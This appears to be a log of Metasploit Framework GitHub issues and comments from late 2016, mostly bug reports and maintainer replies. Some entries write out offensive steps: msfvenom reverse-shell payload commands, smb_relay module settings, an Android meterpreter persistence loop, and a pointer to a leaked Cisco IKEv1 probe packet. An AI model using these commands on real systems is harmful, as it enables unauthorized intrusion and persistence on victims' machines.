yea, i looked at that, but decided that since ftp command itself worked, it was prob something in msf

[2016-09-05 21:58] h00die commented on #7277
also, seems my wifi driver crashes whenever i wireshark or tcpdump... maybe ill rebuild tonight

[2016-09-05 22:41] wvu-r7 commented on #7277
Cool, let me know. If you want to keep ```ENOTCONN``` in this issue, I'll just reopen it when #7278 lands.

[2016-09-07 02:23] h00die commented on #7277
rebuilt kali from scratch tonight. `apt-get update && apt-get upgrade`, wireshark still kills my wifi, must be an issue with the driver.
I'm still getting the same 2 errors.  I'll try physical Ethernet tomorrow, see if that fixes it.

[2016-09-09 11:51] justinsteven opened #7293 "Killing a cmd/windows/reverse_powershell session with ^C causes 100% CPU on victim"
## Steps to reproduce

1 Generate a `cmd/windows/reverse_powershell` payload

[code]

2 Start a handler

[code]

3 Pop `cmd.exe` on Windows 10 Pro x64, paste the payload. My Windows 10 lab box is relatively up to date, I can look more in to its exact patch level if it's relevent.

4 Shell rolls on in. `exit` it.

[code]

The victim machine's CPU is fine. `powershell.exe` dies.

5 Repeat step 3

6

[2016-09-09 11:58] rasta-mouse commented on #7293
Repeatable on Windows Server 2012 R2

[2016-09-10 15:56] user843 opened #7295 "Java payloads don't run on jre 1.4.2 linux - Unsupported major.minor version 49.0 error"
## Steps to reproduce
1. create a java payload using msfvenom, for example: ./msfvenom -p java/meterpreter/reverse_https LHOST=<IP> LPORT=<PORT> > /tmp/jmr_https
2. copy and run the jar file on a linux host using jre 1.4.2, for example I have an Oracle server on CentOS5: /u01/app/oracle/product/10.2/db_1/jre/1.4.2/bin/java -jar jmr_https
## Expected behavior

The jar file gets executed without any

[2016-09-10 23:55] bcook-r7 commented on #7295
That means we need to build them with an older JDK. Not sure if the source builds for something that old still, will need to double-check.

[2016-09-11 13:10] user843 opened #7297 "Pivoting with linux/x86/meterpreter/reverse_tcp - error "session closed. Reason: Died""
Pivoting using the route or portfwd command makes the linux/x86/mterpreter/reverse_tcp die.
## Steps to reproduce
1. Get a linux/x86/meterpreter/reverse_tcp  session.
2. Add a route or portfwd, for example: portfwd add -l 80 -r SOME_REMOTE_HOST -p 80
3. Open a web browser and navigate to http://attacker_ip:80
## Expected behavior

Being able to route traffic through the meterpreter session on the

[2016-09-11 17:06] vysec opened #7298 "Cloning Metasploit Error"
[code]

Basically git clone https://github.com/rapid7/metasploit-framework

bundle install

msfconsole

Then this error

[2016-09-11 19:24] pbarry-r7 commented on #7298
Hi @vysec,

I did a fresh clone just now on my Ubuntu 14.04 system, worked as expected (see below).  What OS are you using?  Could it be something along the lines of running out of disk space while installing gems?  FWIW, I'm on ruby 2.3.1, as well.

[code]

[2016-09-11 19:34] vysec commented on #7298
Weird. I'll check again and get back to you. Shouldn't be disk space issue.

[2016-09-11 19:34] vysec commented on #7298
Running Kali

[2016-09-11 20:22] pbarry-r7 commented on #7298
Sounds good, thx.

[2016-09-11 20:23] vysec commented on #7298
Urgh same issue. Even tried gem uninstall nokogiri

[2016-09-11 20:24] pbarry-r7 commented on #7298
Hmmm, lemme try with Kali when I'm back on my computer.  Are you on the lastest rolling or a different version?

[2016-09-11 20:26] vysec commented on #7298
Fixed, I think the nokogiri was corrupted. I did:

[code]

[2016-09-11 20:26] #7298 closed

[2016-09-11 20:27] pbarry-r7 commented on #7298
:+1:

[2016-09-12 15:55] wvu-r7 commented on #7277
Reopening for ```ENOTCONN```. Feel free to close and create another issue if you want.

[2016-09-13 05:27] drnextgis commented on #7206
I've faced with the same issue. Hopefully helps some future googlers:

[code]

[2016-09-13 06:24] nixawk opened #7302 "[sugarcrm_unserialize_exec] - Exploit failed: NoMethodError undefined method `include?' for nil:NilClass"
## Steps to reproduce

How'd you do it?

1. Install webapp - [SugarCE-6.5.23](https://www.exploit-db.com/apps/12a23b5c52bfef86e3338f2eb212f0ba-SugarCE-6.5.23.zip)
2. try **exploit/unix/webapp/sugarcrm_unserialize_exec** against the target.

## Expected behavior

[code]

## Current behavior

[code]

`~/.msf4/logs/framework.log` as follow:

[code]

## System stuff

### Metasploit version

[code]

##

[2016-09-13 14:32] bcook-r7 commented on #7206
Was it resolved for you, or still an issue?

[2016-09-13 14:46] drnextgis commented on #7206
After using `metasploit-latest-linux-x64-installer.run` instead `metasploit-latest-linux-installer.run` problem is gone.

[2016-09-13 20:41] wvu-r7 commented on #7297
Thanks for the bug report. Linux Meterpreter isn't exactly stable to begin with.

[2016-09-13 22:30] wchen-r7 commented on #7302
This is no longer an issue. Resolved in #7303

[2016-09-13 22:30] #7302 closed

[2016-09-14 02:00] Bruk0ut opened #7309 "exploit/multi/script/web_delivery PSH target /w SSL option set to true, results in PSH stager syntax error."
## Steps to reproduce

TL;DR, If you use the exploit/multi/script/web_delivery module, specify the PSH target and set SSL to true, the framework will generate a PSH stager with a syntax error because it is missing a semi-colon after the "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}" call.

How'd you do it?

1. Use exploit/multi/web_delivery module
2. Set SSL to true
3.

[2016-09-14 04:04] h00die commented on #7259
lhot or lhost?  Shouldn't there be a space before the final R? I'd also use `-o shell.apk` instead of > shell.apk

[2016-09-14 04:07] h00die commented on #7216
https://www.exploit-db.com/exploits/40345/
and
https://www.exploit-db.com/exploits/40296/
I may attempt 40296 next weekend, seems pretty trivial.

[2016-09-14 04:54] OJ opened #7312 "Meterpreter session architectures not tracked in MSF properly"
Once a Meterpreter session has been established back to MSF, it's possible to migrate from one process to another, as we know.

Unfortunately there's a small issue where during or after migration, no steps are taken to make sure that the new architecture of the session is tracked. Ideally, we should update the UUID of the session to match the new architecture, but we don't.

This doesn't prove to

[2016-09-14 05:03] hdm commented on #7312
Thanks @OJ! One last item:

3. Make sure the session object & database record have the new arch stored as well.

[2016-09-14 05:07] justinsteven commented on #7312
[code]

[code]

[code]

[code]

[code]

[code]

[code]

[code]

[code]

[code]

[code]

And `notepad.exe` (the process I migrated to) crashes.

[2016-09-14 05:09] OJ commented on #7312
Thank you @justinsteven for the testing :)

[2016-09-14 06:13] hktalent opened #7315 "Bug report:auxiliary/scanner/discovery/arp_sweep"
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.0.1/16
set THREADS 33
run -j
ifconfig: up: permission denied
[-] Auxiliary failed: RuntimeError en0: You don't have permission to capture on that device ((cannot open BPF device) /dev/bpf6: Permission denied)
[-] Call stack:
[-]   /Users/xiatian/safe/metasploit-framework/lib/msf/core/exploit/capture.rb:124:in `open_live'
[-]   /Users/xia

[2016-09-14 14:39] pbarry-r7 commented on #7315
Sounds like you might need to use **setcap** and/or add your non-root user to a specific group in order to up+capture on the en0 network interface.  Googling some of those error strings will give you some examples.

[2016-09-14 18:01] #7247 closed

[2016-09-14 18:27] #7267 closed

[2016-09-14 18:29] pbarry-r7 commented on #7267
Verified the plugin now uses/displays/accepts the openvas ID values.

[2016-09-14 19:21] wchen-r7 commented on #7177
Hi @bkr32, haven't heard from you and we're not able to reproduce here. I will go ahead and close the ticket, but if you see it again, please feel free to ask us to reopen. Thanks!

[2016-09-14 19:21] #7177 closed

[2016-09-14 19:30] wchen-r7 opened #7318 "sugarcrm_rest_unserialize_exec does not work for a larger payload"
User may experience the following outcome when using sugarcrm_rest_unserialize_exec with a larger payload such as php/meterpreter_reverse_tcp:

[code]

A smaller payload such as php/meterpreter/reverse_tcp does not have this issue.

Problem was first mentioned in: https://github.com/rapid7/metasploit-framework/pull/7284#discussion-diff-77943645a

Related to pull request #7284

[2016-09-14 22:07] OJ commented on #7318
@wchen-r7 so what do you think the preferred method will be? Clearly the executed payload needs to be sent to the target via the `POST` body. My current vote would be to see it baked into the file that is written to disk, rather than having an execution cradle written. The main reason is OPSEC related: instead of having a general runner that could be abused by another person to execute _any_ paylo

[2016-09-15 13:03] vysec opened #7319 "SMB Relay module not working"
## Steps to reproduce

1. use exploit/windows/smb/smb_relay
2. set RHOST <target>
3. set LHOST <myIP>
4. set LPORT <myPort>
5. set payload windows/meterpreter/reverse_tcp
6. run

on another box on same domain \\<myip>\c$

## Expected behavior

Shell

## Current behavior

`[*] [2016.09.15-14:01:30] Error processing request from 192.168.58.1:18185 (115): NameError uninitialized constant Msf::Modules

[2016-09-15 13:34] zero77 opened #7320 "Exploit Request"
Can you add these to android exploits to the metasploit framework, the poc code and cve are blow.

CVE-2015-1538
https://raw.githubusercontent.com/jduck/cve-2015-1538-1/master/Stagefright_CVE-2015-1538-1_Exploit.py

CVE-2016-3861
https://www.exploit-db.com/exploits/40354/

[2016-09-15 14:33] busterb commented on #7319
if this is a git clone, why is it under /usr/share/metasploit-framework (where kali's actual package resides) ? Or did you figure that out?

[2016-09-15 14:34] busterb commented on #7319
definitely not recommended to git clone over directories owned by the distribution, since it uses its own special management of ruby gems, etc. that is broken if you put your own files there.

[2016-09-15 14:36] vysec commented on #7319
Don't worry. I just left it. It should usually work. I'll just use another tool.

I removed msf from the distro and recreated it.

[2016-09-15 14:39] bcook-r7 commented on #7319
No worries, thanks for the info. I'll grab this and check it out.

[2016-09-15 15:17] busterb opened #7321 "SSH modules broken after Net::SSH update"
## Steps to reproduce

Run the following RC script, which iterates through many of the SSH-using modules, observe failures:

[code]

[code]

## Expected behavior
The modules should largely fail, but not due to typos, missing requires, invalid arguments, missing functionality, etc.

What should happen?

## Current behavior

What happens instead?
Many of the modules fail for reasons unrelated to the

[2016-09-15 15:18] busterb commented on #7321
I have partial fixes for some of these modules, but others require deeper rework of the modules themselves. Will submit partial PR in a bit.

[2016-09-15 15:34] bcook-r7 commented on #7321
WIP branch: https://github.com/bcook-r7/metasploit-framework/tree/fix-ssh-modules

[2016-09-15 20:28] wvu-r7 opened #7323 "domain_hashdump hanging after NTDS repair"
@Slurpgeit reported this on IRC. Details forthcoming? This is a placeholder issue.

[2016-09-15 20:33] Slurpgeit commented on #7323
I hereby promise to provide details soon :)

[2016-09-15 20:39] wvu-r7 commented on #7320
You can expect CVE-2015-1538 soon. Patches welcome, too. :)

[2016-09-15 20:39] #7320 closed

[2016-09-15 20:42] wvu-r7 commented on #7315
Or run as root if it's worth the risk.

[2016-09-15 20:42] #7315 closed

[2016-09-15 21:45] bcook-r7 opened #7324 "#7086"

[2016-09-15 21:45] #7324 closed

[2016-09-16 06:15] h00die commented on #7321
+1 on this, replicated exploit/linux/ssh/exagrid_known_privkey
[-] Exploit failed: NameError undefined local variable or method `ssh_socket_factory'

[2016-09-16 07:42] unfo opened #7327 "Feature request: Add numbers to search results for easier access"
## Numbered search results

I want the `search` function to store the latest search results so that I as a user am able to say `use 4` instead of a long `use post/windows/someword/foobar` which is the current method.

## Expected behavior

[code]
So it is easier for me as a user to say:

[code]

and then if that module was not what I was looking for: `use 3` will take me to `auxiliary/admin/mssql/

[2016-09-16 15:14] s3c opened #7329 "Meterpreter python module fails with urllib and threading"
I'm writing some python scripts to automate information gathering, which I configured to launch with AutoRunScript. When running my script on Linux and Windows without meterpreter it works great, but when using the meterpreter python module the threads disappear after calling urllib2.urlopen.

To reproduce, use the script below, which has the threading module commented and does everything in a sin

[2016-09-16 15:43] egypt commented on #7188
@OJ `RHOST` set to 127.0.0.1 should not be a problem if the ssh tunnel is set up correctly and you use a bind payload. If people are being screwed by this, isn't it their ssh settings that are screwing them, not `RHOST`? (Also, @mubix's description is about `LHOST` not `RHOST`)

@RoganDawes What do you mean by "failed randomly"? Failed to bind?

[2016-09-16 15:44] egypt commented on #7188
If it is a failure to bind, `set ReverseListenerBindAddress 0.0.0.0` would probably fix it.

[2016-09-16 15:48] egypt commented on #3854
@dmaloney-r7 Was this fixed by #5348?

[2016-09-16 16:01] egypt commented on #7329
Have you verified on the server that the request is not getting sent? Threading makes output tricky sometimes -- I think it's possible the request is happening and you're just not seeing the `print`.

@OJ am I off base here? Is threading on the python extension possible?

[2016-09-16 16:15] bcook-r7 commented on #7319
Hmm, I think this might need some adjustment after the NTLM gem update. Tossing to @egypt

[2016-09-16 16:42] RoganDawes commented on #7188
Not a failure to bind. Binding is fine, transfer begins, but the execution
of the Meterpreter payload fails randomly.

Note that i am not using ssh, it is a socat to tcp port on an esp8266,
relayed over the uart, coming out over USB keyboard to a tcp socket. ;-)

See http://github.com/sensepost/usabuse if you are interested.

Rogan

On Fri, 16 Sep 2016 at 4:45 PM egypt <notifications@github.com> w

[2016-09-16 16:46] RoganDawes commented on #7188
And yes, it is LHOST that is set to 127.0.0.1 that appears to be the
problem. Using 0.0.0.0 i have not seen any failures.

Rogan
On Fri, 16 Sep 2016 at 5:42 PM Rogan Dawes <rogan@dawes.za.net> wrote:

[2016-09-16 17:51] mubix opened #7330 "Make msfconsole a command inside of msfconsole"
Many new users of metasploit have made the mistake of starting msfconsole inside of msfconsole and it would be nice if there was a warning instead of allowing it to get passed to the shell.

[2016-09-16 20:36] s3c commented on #7329
I can confirm that the requests do not get made when using threading, which is interesting as the messages inside the threads still get printed. I tested with:

python -m SimpleHTTPServer 80

Also, every now and again when not using threading, the script exits/dies/whatever halfway through, and no further output is given. I haven't been able to reproduce this reliably though. So it seems this scri

[2016-09-16 22:30] OJ commented on #7329
Technically this should be filed as a bug against the [Metasploit Payloads](https://github.com/rapid7/metasploit-payloads/) repo, but we'll leave it here for now! @s3c if you have future issues with Meterpreter itself, please may I request that you log the bugs over there? I've filed a

Thank you @s3c for the report. This behaviour sounds strange. Threading inside the python extension _should_ wor

[2016-09-16 22:36] s3c commented on #7329
Thanks @OJ, will do. I just realized that urllib2 isn't thread safe, so this could be completely my fault. I'm going to try a workaround and will update when I have some findings.

[2016-09-17 11:12] s3c commented on #7329
The thread safety issue for urllib2 steams from the fact that urlopen uses the same opener for all calls. Even when creating a dedicated opener for each thread, I get the same response. For reference, the following lines were used instead of the urlopen line in the original script:

opener = urllib2.build_opener()
opener.open(POST_URL + tmpname, file_data)

This matches the results of running the

[2016-09-17 13:52] zero77 opened #7331 "HVNC Module Request"
Can you create a hidden vnc module for metasploit.

This blog post explains how it works and has some pos code:
https://www.malwaretech.com/2015/09/hidden-vnc-for-beginners.html

Thanks

[2016-09-17 13:53] zero77 opened #7332 "Form Grabbers Module Request"
Can you create a form grabbers module for metasploit.

This blog post explains how it works with some pos code:
https://www.malwaretech.com/2013/11/formgrabbers-for-beginners.html

Thanks

[2016-09-17 14:57] thc-force opened #7333 "getsystem.rb include in windows/meterpreter_reverse_http.rb"
Hey

I'd like to include post/windows/escalate/getsystem.rb in windows/local/ask.rb script. Below I put my source code. I have a problem, becouse when i run this module in msfconsole, and new admin-privileged session is open, msf show this message:  "Failed to obtain SYSTEM access". Can you help me solve the problem in source code?.
I would be very grateful for the help.

[code]

[2016-09-17 16:33] wwebb-r7 commented on #7331
A hidden VNC module, while not technologically infeasible, would be ridiculous, akin to digging a tunnel with a ball peen hammer.  It would be better handled as a Meterpreter extension.  You can submit a pull request with some code here if you'd really like to see it https://github.com/rapid7/metasploit-payloads

Closing this and your other recent issue for the same reason

[2016-09-17 16:33] #7331 closed

[2016-09-17 16:34] #7332 closed

[2016-09-19 09:19] pr0letariat opened #7336 "GPG error when updating, key expired"
## Steps to reproduce

`sudo apt-get update`

## Expected behavior

Metasploit updates.

## Current behavior

[code]

## System stuff

[code]

[code]

### Metasploit version

[code]

### Other information:

[code]

[2016-09-19 10:27] nixawk commented on #7336
@pr0letariat please try following commands:

[code]

[2016-09-19 11:04] pr0letariat commented on #7336
@nixawk  That worked, thanks.

[2016-09-19 11:54] #7336 closed

[2016-09-19 15:59] pbarry-r7 opened #7337 "msfvenom using the x86/nonupper encoder appears to be busted"
## Steps to reproduce

How'd you do it?
1. try to create an encoded payload (e.g. `./msfvenom -p windows/meterpreter/bind_tcp -e x86/nonupper -f c`)
2. hit the following error:

[code]
## Expected behavior

Expected an unsigned char array containing the encoded payload.
## Current behavior

The above error.
## System stuff
### Metasploit version

ec63f8feaf3bf88ace248feb732de44cea795788 Land #7113

[2016-09-20 00:44] h00die commented on #7144
@wchen-r7 close.

[2016-09-20 00:44] h00die commented on #7145
@wchen-r7 close.

[2016-09-20 05:05] bcook-r7 commented on #7144
thanks @h00die

[2016-09-20 05:05] #7144 closed

[2016-09-20 05:06] bcook-r7 commented on #7145
roger

[2016-09-20 05:06] #7145 closed

[2016-09-20 12:59] jvoisin commented on #5815
I can still reproduce it, with the latest (27018b421c1cd7eae58e9bed46ccfd4597c44730) git version:

[code]

[2016-09-20 14:40] bcook-r7 commented on #5815
Thanks, I'll reopen.

[2016-09-20 14:45] bcook-r7 commented on #5815
Seems to be a slightly different error than before:

[-] Post failed: ActiveRecord::StatementInvalid PG::CharacterNotInRepertoire: ERROR:  invalid byte sequence for encoding "UTF8": 0xe9

vs

[-] Post failed: ActiveRecord::StatementInvalid PG::CharacterNotInRepertoire: ERROR:  invalid byte sequence for encoding "UTF8": 0xe9 0x27 0x20

[2016-09-20 15:22] wvu-r7 commented on #7337
Confirmed on OS X.

[2016-09-20 21:15] wvu-r7 commented on #7336
@nixawk:

I think you meant to use ```sudo tee```, since ```sudo echo >``` doesn't elevate the redirection.

[2016-09-20 21:15] wvu-r7 commented on #7336
@nixawk: I think you meant to use ```sudo tee```, since ```sudo echo >``` doesn't elevate the redirection.

[2016-09-20 21:22] pbarry-r7 commented on #7336
And I believe the second step needs the **sudo** moved from the wget over "after the pipe" (preceding the apt-key command), like such:

`wget -O - http://apt.metasploit.com/metasploit-framework.gpg.key | sudo apt-key add -`

[2016-09-20 21:22] pbarry-r7 commented on #7336
And thanks for hopping in on this one, @nixawk!!

[2016-09-20 21:37] h00die commented on #7327
This is strangely similar to #4336

[2016-09-20 21:37] h00die commented on #4096
@hdm merged, close.

[2016-09-20 21:46] wvu-r7 commented on #7330
@bpatterson-r7:

```export PATH+=:.``` will help you repro. Do this TEMPORARILY. Even though it's at the end, you really don't want ```.``` in ```$PATH```.

You'll want to look inside ```lib/msf/ui/console/driver.rb```, ```lib/msf/ui/console/command_dispatcher/core.rb```, and ```lib/rex/ui/text/dispatcher_shell.rb```, but only one file will need to be modified.

Cheers!

[2016-09-20 22:24] #4096 closed

[2016-09-20 23:07] #7330 closed

[2016-09-21 00:47] h00die commented on #6881
the drops.wooyun.org paper seems to not be working.  The page is just a jpg or other non-text object and google translate can't do anything with it.  Maybe its a 404 or something?

[2016-09-21 01:27] hdm commented on #4096
thanks!

[2016-09-21 04:41] unfo commented on #7327
Yes. This clearly is a duplicate issue. Pardon my lack of finding the previous issue.

Closing this as duplicate since that has all the same functionality requirements as mine.

[2016-09-21 04:41] #7327 closed

[2016-09-21 14:59] jvoisin commented on #5815
It think it's because the unsupported character is a different one.

[2016-09-21 18:37] bwatters-r7 opened #7348 "Scanner modules fail on check() function because RHOST is not populated"
## Steps to reproduce

### start netcat listener on 127.0.0.1:21
`nc -lv 127.0.0.1 -p 21`

### set up [verbose] bison_ftp_traversal module
[code]

## Expected behavior
No surprise that the login fails, but notice that the check function does not even get an IP address to check, but the exploit function does.

## Current behavior
The check should fail after connection; in this case, the check fails

[2016-09-21 20:49] bwatters-r7 commented on #7348
Hmmmm.......  Did not notice this closed ticket.  Seems relevant.
https://github.com/rapid7/metasploit-framework/issues/7277

[2016-09-22 12:03] bcook-r7 commented on #7319
I did a quick look here, looks like there was a half-cleanup of NTLM_ path aliases, but nobody actually verified these weren't in use by modules. I'm going to restore the missing aliases, then proper cleanup needs to happen via 'git grep' on all the modules, followed by testing as well.

[2016-09-22 14:52] Slurpgeit commented on #7323
Ok, so I did my best, but I couldn't get any really relevant info. I tried replicating it on my test domain, but it did not do anything weird.

I did do an engagement this week where it sort-of happened. After running the module it stopped after dumping the first hash (there were about 200 users, nothing too major):

[code]

I can't share the ntds file for obvious reasons. This is the DC in questi

[2016-09-23 00:00] h00die opened #7354 "OptEnum wiki example wrong"
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options
The example shows:
`OptEnum.new('FRUIT', [ true, 'Set a fruit', ['apple', 'orange'], 'apple' ])`
however, the array and the default value are mixed up in order, it should be:
`OptEnum.new('FRUIT', [ true, 'Set a fruit', 'apple', ['apple', 'orange']])`

As can be seen on: https://github.com/rapid7/metasploit-framework/

[2016-09-23 00:14] bcook-r7 commented on #7354
Fixed, thanks.

[2016-09-23 00:14] #7354 closed

[2016-09-23 02:13] h00die commented on #6928
conversion PR submitted.

[2016-09-23 05:07] void-in commented on #7354
@bcook-r7 Please update another section as well. Although it is a little typo, it is confusing on first read. Currently the document is reading:
[code]
It should be:
However, like we said earlier, if the user sets a **module-level** option, no other components will see it...

[2016-09-23 05:54] busterb commented on #7354
Roger, updated.

[2016-09-23 16:24] netdestroyer opened #7358 "Error in metasploit - Help me please"
hi guys , i have KALI Rolling 2.0
when prompt in terminal :
[root:~]# msfconsole
Please run msfdb as a non-root user
/usr/bin/msfconsole: 106: [: /opt/metasploit-framework/bin/../embedded/framework/msfconsole: unexpected operator
/opt/metasploit-framework/bin/../embedded/bin/ruby: No such file or directory -- /opt/metasploit-framework/bin/../embedded/bin/msfconsole (LoadError)

help me please :*

[2016-09-23 17:34] #7348 closed

[2016-09-23 20:21] bcook-r7 commented on #7358
KALI Rolling 2.0..... are you sure? I don't think you can have both 'Rolling' and '2.0'

Can you give a little more detail about what you did before this?

[2016-09-25 17:10] #7319 closed

[2016-09-25 23:52] bcook-r7 commented on #7234
This should be fixed now. The module had to be largely rewritten with a custom state machine in #7232

[2016-09-25 23:52] #7234 closed

[2016-09-25 23:53] bcook-r7 commented on #7234
That is, #7339 fixes it.

[2016-09-25 23:53] bcook-r7 commented on #7321
Fixed in #7339

[2016-09-25 23:53] #7321 closed

[2016-09-26 00:08] bcook-r7 commented on #6513
Is this related? #6986

[2016-09-26 00:22] h00die commented on #7358
[2016.2 rolling](https://www.kali.org/news/kali-linux-20162-release/)
Anyways, try an `apt-get update` `apt-get upgrade`, maybe a new package will fix it. mine loads fine and im on 2016.2 and just updated within the last 5min

[2016-09-26 10:25] netdestroyer commented on #7358
i try apt-get update apt-get dist-upgrade but i have a same errors

[2016-09-26 15:22] nixawk commented on #7358
@netdestroyer Please redirect to [GPG error when updating, key expire](https://github.com/rapid7/metasploit-framework/issues/7336)

[2016-09-26 15:46] netdestroyer commented on #7358
thanks @nixawk
now i have another error like this

[root:~]# msfconsole
Please run msfdb as a non-root user
/opt/metasploit/ruby/lib/ruby/site_ruby/2.3.0/rubygems.rb:8:in `require': cannot load such file -- rbconfig (LoadError)
	from /opt/metasploit/ruby/lib/ruby/site_ruby/2.3.0/rubygems.rb:8:in `<top (required)>'
	from <internal:gem_prelude>:4:in `require'
	from <internal:gem_prelude>:4:in `<inte

[2016-09-26 22:35] #7140 closed

[2016-09-27 12:38] strasharo commented on #4214
Unfortunately I accidentally lost the database with the old creds and can no longer test it. Thanks a lot for your help.

[2016-09-27 12:38] #4214 closed

[2016-09-27 16:58] wvu-r7 commented on #7333
This should be a pull request.

[2016-09-27 16:58] #7333 closed

[2016-09-27 17:06] wvu-r7 commented on #7333
Issues are for bug reports or feature requests. If you need coding help, please go to the #metasploit IRC channel on freenode or pose a question to the community site at https://community.rapid7.com/. Thanks!

[2016-09-27 17:07] wvu-r7 commented on #7323
Thanks, @Slurpgeit!

[2016-09-27 17:20] bcook-r7 opened #7366 "PHP meterpreter no longer works with macOS 10.12 system PHP installation"
## Steps to reproduce

From @mubix on IRC:

[code]

[2016-09-27 17:21] bcook-r7 opened #7367 "Python meterpreter no longer works with macOS 10.12 system python installation"
## Steps to reproduce

From @mubix on IRC:

python meterpreter fails with:

[code]

[2016-09-27 17:32] bwatters-r7 commented on #7337
Did this ever work?  I pulled a few old releases of Framework, and it behaves the same in all.  Oldest was Sept 2015.  If this was a regression, it has been around a while.

[2016-09-27 17:51] bwatters-r7 commented on #7309
Thanks for the effort to help us out on this, @Bruk0ut!

[2016-09-27 18:10] pbarry-r7 commented on #7337
Good question, @bwatters-r7.  I hit this while we were working on some Rex breakup, @dmaloney-r7 could probably say (certainly it sounded like it's expected to work)...

[2016-09-28 00:44] h00die opened #7370 "FreePBX < 13.0.188.1 Remote root exploit"
Looks like it posted to edb, but wasn't PRed here...
https://www.exploit-db.com/exploits/40434/

[2016-09-28 07:14] nixawk opened #7371 "[request] Cisco IKEv1 Information Disclosure - CVE-2016-6415"
## Introduction

From https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1

## Questions

Any body analysis the principle of [CVE-2016-6415](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6415) ?
- How to generate a evil IKEv1 packet ?
- How to develop a module for the vulnerability ?

Compare the packets between vuln cisco and non-vuln cisco,

![i

[2016-09-28 08:33] madmike33 commented on #7370
yup was wondering why :/ ?

[2016-09-28 09:10] h00die commented on #7370
@wvu-r7 This may be good Intern/new employee work:
Someone should go through edb for "(Metasploit)" in the title name, and verify all of the results are in MSF.  I suspect there's a handful that are not, similar to #4096

[2016-09-28 11:13] madmike33 commented on #7370
Iam interested :)

[2016-09-28 12:03] Slurpgeit opened #7373 "registry_persistence module unicode bug"
The registry_persistence module doesn't work currently due to a unicode bug. In short, meterpreter writes to the registry using the wrong encoding. For more details and a possible work-around, please refer to: https://diablohorn.com/2016/09/27/meterpreter-registry-unicode-quirk-work-around/

[2016-09-28 12:13] OJ commented on #7373
This is already being tracked in the Payloads repo. Thanks @Slurpgeit . https://github.com/rapid7/metasploit-payloads/issues/127

[2016-09-28 12:13] #7373 closed

[2016-09-28 15:28] wvu-r7 commented on #7370
There are quite a few, yes.

[2016-09-28 15:43] busterb commented on #7370
@madmike33 are you working on this? if not, I'll get someone on it.

[2016-09-29 04:54] nixawk commented on #7371
If any body wants to if your cisco is vulnerable or not, please try:

[code]

download [**sendpacket.raw**](https://github.com/adamcaudill/EquationGroupLeak/blob/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110/sendpacket.raw)

----

## Method 1:

[code]

![cisco-packet](https://cloud.githubusercontent.com/assets/7352479/18941430/b0c01e4a-85d6-11e6-99a5-3095de76fbbf.png)

## Method 2:

[cod

[2016-09-29 21:41] #6476 closed

[2016-09-30 00:56] Viss opened #7380 "feature request:"
There is a new feature of metasploit that few people probably use. It's called 'beholder'.
It's designed to basically conduct surveillance by way of obtaining screenshots, webcam pictures and keylogs from every available shell currently connected to msf.

There's a bit of a bug though - if you have 10 shells on a machine (because if you attempt webcam pictures, you get 1-2 pics then the shell dies

[2016-09-30 03:19] hdm commented on #7380
Hijacking this issue specifically for the "unique shells" issue (only run on *one* shell of each user+machine combination). Generating new sessions and fixing any issues that lead to features not working should be split into separately.

[2016-09-30 03:22] OJ commented on #7380
Does the beholder plugin use the espia extension or the standard screenshot facility? If it's the latter, we're also copping the cost of uploading a binary every time the `screenshot` command is run.

[2016-09-30 03:23] OJ commented on #7380
To be clear, that binary is RDI'd into the target session every time. I'm sure there'll be a limit to how many times that can be done before things go bad.

We should probably fix that too.

[2016-09-30 05:35] hdm commented on #7380
That seems like the root cause for screenshot failing after X runs (or some leaked GDI handle). The webshot stuff is different, you will get one good capture (if youre lucky), and then either a crash, or empty image afterwards.

[2016-09-30 06:42] Viss commented on #7380
![image](https://cloud.githubusercontent.com/assets/1756255/18982897/6ecbce1c-869e-11e6-926e-c6f46bab811e.png)

this is literally me right now.

[2016-09-30 14:37] hacksoldier98 opened #7386 "probable payload bug Android"
hi .. for me is the first time I write here.
my problem is that I noticed that when I create the apk with this command:

msfvenom -p android/meterpreter/reverse_tcp -LHOST=ip -LPORT=port -o /root/meterpreter.apk

and after it installed on dispitivo victim but not yet open, and create a persistence with the apk that says this in a .sh file:

while :
do am start --user 0 -a android.intent.action.MAI

[2016-10-01 20:26] h00die commented on #7386
not sure if its relevant, but #7378 landed 2 days ago, does that fix it?

[2016-10-01 20:29] h00die commented on #7386
#7362 is still open, also possibly dealing with the same thing

[2016-10-02 11:04] Luis-Hebendanz opened #7388 "[Bug] autopwn2 server throws exception on connection"
## Steps to reproduce
With a clean install of metasploit development and a new .msf4 folder I started the autopwn2
module and hit run:

Then I connected with my firefox browser to the given URL and this error pops up:

I noticed it alway hangs up at the first exploit regardless if I changed it.
If I start a standalone browser exploit it works just fine.

## System Stuff
This was on an Ubuntu machi

[2016-10-02 11:41] roman-mueller opened #7389 "nasm_shell.rb cannot find assembly installation"
## Steps to reproduce

1. Run:
[code]

## Expected behavior

I expected to get the nasm_shell prompt.

## Current behavior

It only throws the error:
No assembly installation was found.

## System stuff

### Metasploit version

Framework: 4.12.28-dev
Console: 4.12.28-dev

### I installed Metasploit with:
- [X] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community instal

[2016-10-02 11:57] Qubasa opened #7390 "[Bug] Autopwn2, no js detection"
## Steps to reproduce

So I started the autopwn2 module with these configurations.

Now I used a test android phone. I used the default browser and got this result:

So my test phone isn't vulnerable to this exploits but the browser requirements where met so these possible exploits got choosen. Now the problem begins to shine. Normally if I would for example start the webview exploit as standalone

[2016-10-02 12:39] timwr commented on #7386
The reason for the error is because since https://github.com/rapid7/metasploit-payloads/pull/104 landed, the activity will hide itself after it's initial launch. I'm considering turn this into an option instead as it seems to confuse people.
This is unrelated to 7362 and 7378.
You can replace ```am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity```
with ```am sta

[2016-10-02 17:27] wvu-r7 commented on #7389
Oh, that's new. It was working for me just a little while ago.

[2016-10-02 17:33] wvu-r7 commented on #7389
Err, I was using ```metasm_shell.rb```, nvm. This is broken for me, too.

[2016-10-02 17:51] wvu-r7 commented on #7389
Broken as of d2a6c2e9ca13dd466f961bc651e105ba3651e595 in #7208.

[2016-10-02 18:10] henshin opened #7391 "Nessus plugin (nessus.rb) export issues"
The nessus plugin (nessus.rb) is not working properly when we attempt to import the vulnerabilities from a nessus scan to Metasploit's db.

PoC:

[code]

